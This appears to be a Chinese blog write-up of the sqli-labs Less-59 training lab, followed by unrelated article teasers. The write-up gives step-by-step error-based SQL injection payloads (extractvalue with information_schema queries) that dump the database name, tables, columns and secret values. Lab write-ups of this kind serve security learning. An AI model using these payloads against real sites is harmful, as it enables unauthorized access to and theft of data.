sqli-labs/Less-59

news2024/9/24 23:22:35

这一关又只有五次机会 而且仍然是以id作为注入点 我们尽量再前一轮完成注入类型的判断 在后一轮完成各种爆破操作

首先先判断注入类型是否属于数字型注入 输入id=1 and 1=2 回显如下 没有回显 说明后续操作不能使用报错注入解决问题 并且肯定是属于数字型注入 倒是有无修饰符不懂 所以需要我们去佐证一下

佐证一下数字型吧 输入如下

id=1--+

毫无修饰符可言 纯粹就是数字型注入 

第一轮剩余机会太多了 我们试一试能不能使用联合注入 这样比较不会浪费机会

试一试输入如下内容

id=0 union select 1,2,3--+

 可惜这一关也不能使用联合注入完成爆破操作

我尝试了一下报错注入 发现可以使用 我前面的判断出了问题 

进入下一轮一定使用报错注入解决问题

来到下一轮 首先爆库 输入如下

id=0 and extractvalue(1,concat(0x7e,database(),0x7e))--+

回显如下

接下来进行报表操作 输入如下

id=0 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+

 回显如下

接着进行爆字段操作 输入如下

id=0 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='jju98czgng'),0x7e))--+

 回显如下

最后获取的是用户名和密码 输入如下

id=0 and extractvalue(1,concat(0x7e,(select group_concat(sessid,'-',secret_XYBE) from jju98czgng),0x7e))--+

 回显如下

嗨嗨最终成功解题嗨嗨!! 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/32084.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【javaEE】网络原理(数据链路层+小结)

努力经营当下,直至未来明朗! 文章目录前言一、数据链路层1. 以太网2. 认识MTU(没时间可以跳过)3. 认识ARP(没时间就跳过)二、 【网络原理小结】(含面试题)THINK前言 一个人最大的痛…

搭建vue3.2+vite+ts+pinia项目

用到的技术 vue3.2vitetspinia 搭建项目 前言 vue3vite 会比vue2webpack的速度快很多;Vite 是一个轻量级的、速度极快的构建工具; vite官网 创建项目 npm create vitelatest报错了: 初始化失败 npm ERR! Could not install from “File…

【C语言】单词拼写检查

《算法集训传送门》 👉引言 铭记于心🎉✨🎉我唯一知道的,便是我一无所知🎉✨🎉💖 ❄️我们的算法之路❄️💖众所周知,作为一名合格的程序员,算法 能力 是不可…

基于飞书通讯录同步构建本地LDAP服务,打通各应用系统间的组织架构和账号信息

目前飞书社交办公应用成为公司日常沟通办公的协作工具,以及作为各种流程的审批处理系统,HR 也会在飞书上去管理所有员工的状态及组织架构。 随着公司内新部署的业务系统越来越多,例如Jenkins、JIRA、Gitlab、Confluence、禅道等,有…

门店数字化转型| 美发店智慧管理系统

颜值经济时代及他经济崛起,人们更注重自身形象,且追求方便快捷体验好的服务,而且她们越来越理智,不再盲目跟风,关注自身感受,追求便利个性化服务。 美容美发市场规模大但整体线上化程度偏低,下沉…

计算机网络复习——第六章网络层

hhhhh 还是今天的我,今天把这两个肝了,准备27考试,耶耶耶!!!小h加油! 《计算机网络》(谢希仁)内容总结 (javaguide.cn) 重点知识: 域名系统(DN…

gptp报文完成时间同步原理

gptp(generalized Precision Time Protocol,广义精确时间同步协议),能够完成微秒级的时间信息同步 gptp定义了两种类型的设备 每一种设备都有自己的本地时钟,设备中用来发布同步时间报文的网络端口被称为主端口,用来接收时间同步报文的被称…

【Flutter】mixin简单使用

序言 之前有个技改任务,把司机学堂代码由原生转到Flutter。过程中遇到一个问题,学堂资料有pdf、视频、和图片,三种学习都会有几个共同的方法,比如学习进度更新、弹窗提示、完成接口调用等。在iOS中是用协议方法来实现&#xff0c…

Paper写作如何正确掌握模板内容?

要写好Paper绝不仅仅是掌握模版或者结构就够了,也不要指望几个小时内搞定一篇(只有经验超级丰富的人才有可能)。你们要做的是: To write a paper well is not only to master the template or structure,but also not to expect to finish one article i…

现代密码学导论-6-完美保密性的局限性

目录 2.3 Limitations of Perfect Secrecy 完美保密性的局限性 THEOREM 2.11 完美保密对密钥空间的要求 THEOREM 2.11 的证明 2.3 Limitations of Perfect Secrecy 完美保密性的局限性 在前一节的最后,我们指出了一次性密码本方案的缺点。事实上,这些…

vue-cli + APIcloud

1.安装node.js 2.全局安装cli3 npm install -g vue/cli 备注:vue cli3官网 https://cli.vuejs.org/zh/ 3.进入工作目录里运行 vue ui,此时会打开vue的UI面板 4.在面板中创建新项目,输入项目名之后点击下一步,选择预设-默认后直接创…

【手把手】教你玩转SpringCloud Alibaba之Seata

1、事务的概念 分布式事务理论 事务的四大特性:A(Atomic):原子性,构成事务的所有操作,要么都执行完成,要么全部不执行,不可能出现部分成功部分失 败的情况;C&#xff0…

Vue3路由的使用

文章目录1. 路由的集成和使用2. 声明式导航3. 编程式导航4. 获取页面路由参数数据4.1 动态路由传参和query传参4.2 编程式导航传参5. router-view和keepAlive、transition结合1. 路由的集成和使用 安装: yarn add vue-router4创建 router 目录,并在其下…

传奇单机架设教程,五分钟完成单机架设

准备工具:DBC2000 版本 补丁 传奇架设步骤 1.解压补丁到传奇客户端 2.解压版本到D盘盘符 3.安装配置DBC2000 4.打开引擎控制器启动 5.打开登陆器选择单机127.0.0.1 确保自己的热血传奇客户端是16年以后的 最好是最新版的. 不要使用已经淘汰的10周年客户端 …

Windows技巧之注册表

介绍 注册表是Windows操作系统中的一个核心数据库,其中存放着各种参数,直接控制着Windows的启动、硬件驱动程序的装载以及一些Windows应用程序的运行,从而在整个系统中起着核心作用。这些作用包括了软、硬件的相关配置和状态信息&#xff0c…

这便是智能

🍿*★,*:.☆欢迎您/$:*.★* 🍿

复制集群架构设计技巧

Redis Sentinel设计技巧 Redis Sentinel基本架构 Monitoring Sentinel可以监控Redis节点的状态 Notification Sentinel可以通过API进行集群状态通知 Automatic failover Sentinel实现故障自动切换 Configuration provider Sentinel为client提供发现master节点的发现功能…

WebDAV之葫芦儿·派盘+i简记

i简记 支持webdav方式连接葫芦儿派盘。 每天都去记录生活中所消费的琐碎开支,不仅浪费时间,还有很多广告和理财推销。那有没有纯粹的手机在线记账工具?可以轻松把微信、支付宝账单导入,支持外账入内,还有汇率转换等?答案是肯定的,i简记就是非常实用的在线记账工具。 i…

SwiftUI——如何使用新的NavigationStack和NavigationSplitView(如何页面跳转2.0以及如何制作侧栏)

从 iOS 16 开始,苹果开始弃用原先的NavigationView,以后会逐渐完全淘汰掉。现在开始使用NavigationStack和NavigationSplitView。NavigationStack的效果和原本的NavigationView一样,而NavigationSplitView则和现在 iPadOS 上的NavigationView…

Elastic Search(一)

1. elasticsearch 概述 1.1 简介 官网: https://www.elastic.co/ Elasticsearch (简称ES)是一个分布式、RESTful 风格的搜索和数据分析引擎,能够解决不断涌现出的各种用例。 查询和分析 可以自定义搜索方式: 通过 Elasticsearch,您能够执行及合并多种…